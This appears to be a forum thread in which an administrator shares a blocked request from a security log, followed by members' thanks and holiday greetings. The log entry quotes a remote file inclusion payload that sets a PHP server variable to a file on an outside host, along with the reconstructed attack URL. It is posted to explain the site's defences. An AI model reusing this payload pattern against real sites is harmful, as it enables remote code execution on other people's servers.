Security Measures

[Ickie]

This is from my logs this morning, this is a bot trying to infect our root to attack you with a popup

#: 162 @: Sat, 05 Dec 2009 09:31:08 -0500
Host: ip-174-142-120-148.static.privatedns.com
IP: 174.142.120.148
Score: 7
Why blocked: Question mark at end of query. Badly formed query, must not have 2 question marks in a row. RFI (http). Root hack. Nesting attack. No www site, and several attacks. Bothost and/or Server Farm. .
Query: _SERVER[DOCUMENT_ROOT]=http://www. beijingteacher. net/test/fid1.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// www.our site /our forums///?_SERVER[DOCUMENT_ROOT]=http://www. beijingteacher. net/test/fid1.txt??

 

[dhasdell]

Thanks again for all the work Ickie. I see another poster was in Spain, same as me. Has that been a bad area? Is it Telefonica?

 

[HighGround22]

.
Yes, many thanks for your devotion to service, Ickie! We realize it's no walk in the park, keeping the bad *******s at bay (Ooh. Howzat for alliteration?).

Cheers and all the best, Ickie!
.

 

[OTTO]

Any thing to keep SOH safe & running is fine with me !
" Thanks " to all of you guys for your hard work !



" Happy Holidays" to all
OTTO :salute:

 

[wahoo]

Like so many, " Thanks " for all the hard work! I don't often have much to offer to the conversations but would miss them. Thank you again for the efforts. wahoo

 

[Skyblazer100]

Hi guys, sorry that I am mostly a reader and not a contributor, but thank you for the wonderful work you do, I have benefitted so much!
Merry Christmas!

 

[erafitti]

Thanks for the effort (gracias por el esfuerzo).

 

[DOMINIC]

Hello all!

:ernae:

 

[wolfi]

One post is all that is needed. Most of you accomplish that every day. This is really just for those who visit but don't post.

ah, thanks for that information.

wolfi

 

[Scandic]

Hi, again.